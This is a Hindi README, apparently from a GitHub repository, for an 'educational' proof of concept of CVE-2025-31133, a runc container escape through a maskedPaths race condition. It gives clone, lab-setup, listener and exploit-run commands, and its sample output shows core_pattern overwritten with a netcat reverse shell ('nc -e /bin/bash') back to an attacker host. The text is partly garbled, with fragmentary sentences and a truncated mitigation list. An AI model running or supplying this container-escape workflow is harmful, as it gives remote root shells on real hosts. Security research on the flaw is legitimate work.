
CVE-2025-31133 के लिए शैक्षिक प्रमाण-अवधारणा, जो maskedPaths रेस कंडीशन के माध्यम से runc कंटेनर एस्केप है। इसमें लैब सेटअप, एक्सप्लॉइट स्क्रिप्ट और सुरक्षा शोधकर्ताओं के लिए शमन मार्गदर्शन शामिल है।
CVE-2025-31133 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट प्रदर्शन और सीखने का वातावरण, जो runc में एक सुरक्षा भेद्यता है जो maskedPaths सुरक्षा को एक रेस कंडीशन के माध्यम से बायपास करने की अनुमति देती है। maskedPaths को कंटेनरों को संवेदनशील होस्ट फाइलसिस्टम पथों तक पहुँचने से रोकने के लिए डिज़ाइन किया गया है।
https://github.com/user-attachments/assets/d7b4ea43-6cab-4ac5-bb07-08bc46479910
👉 यह रेपो ब्लैक हैट प्रशिक्षण में सिखाए गए सटीक शोध मानसिकता और तकनीकों का एक व्यावहारिक उदाहरण है:
एक्सप्लॉइट एक रेस कंडीशन का लाभ उठाता है जहाँ:
maskedPaths के साथ कॉन्फ़िगर किया जाता है ताकि संवेदनशील फ़ाइलों (जैसे, /proc/sys/kernel/core_pattern) की सुरक्षा की जा सके।/dev/null) का विलोपनयह रिपॉजिटरी केवल शैक्षिक उद्देश्यों के लिए है।
git clone https://github.com/C-h4ck-0/Learn-about-cve-2025-31133-poc.git
cd Learn-about-cve-2025-31133-poc
lab-setup.sh स्क्रिप्ट निम्नलिखित करेगी:
chmod +x lab-setup.sh
./lab-setup.sh
जाँचें कि असुरक्षित runc संस्करण स्थापित है:
runc --version
आपको संस्करण 1.2.0 या समान देखना चाहिए।
nc -lnvp <PORT>
chmod +x cve-2025-31133-exploit.sh
./cve-2025-31133-exploit.sh
सफलता पर, आपको यह देखना चाहिए:
[*] Compiling race condition exploit binary...
[*] Starting exploit attempts...
[*] Target: /proc/sys/kernel/core_pattern
[*] Backing up /proc/sys/kernel/core_pattern...
[*] Backup created at /tmp/core_pattern.bak
[*] Current content of target:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
====================================================
[*] Testing delay: 5 microseconds
====================================================
X..
[+] ========================================
[+] SUCCESS! Exploit succeeded.
[+] ========================================
[+] Original content:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
------------------------------------------------
[+] Modified content:
|/bin/nc.traditional <ip-address> <port> -e /bin/bash
------------------------------------------------
./exploit.sh: line 148: 7068 Segmentation fault (core dumped) sleep 5
[*] Restoring original content...
[*] Restoration complete.
आपके लिसनर से एक रिवर्स शेल कनेक्शन स्थापित होना चाहिए।
इस भेद्यता से बचाव के लिए:
core_pattern को पुनर्स्थापित करती हैयह परियोजना शैक्षिक उद्देश्यों के लिए प्रदान की गई है। जिम्मेदारी और नैतिकता से उपयोग करें।
याद रखें: सुरक्षा अनुसंधान उपकरणों का हमेशा जिम्मेदारी से और केवल उन वातावरणों में उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है।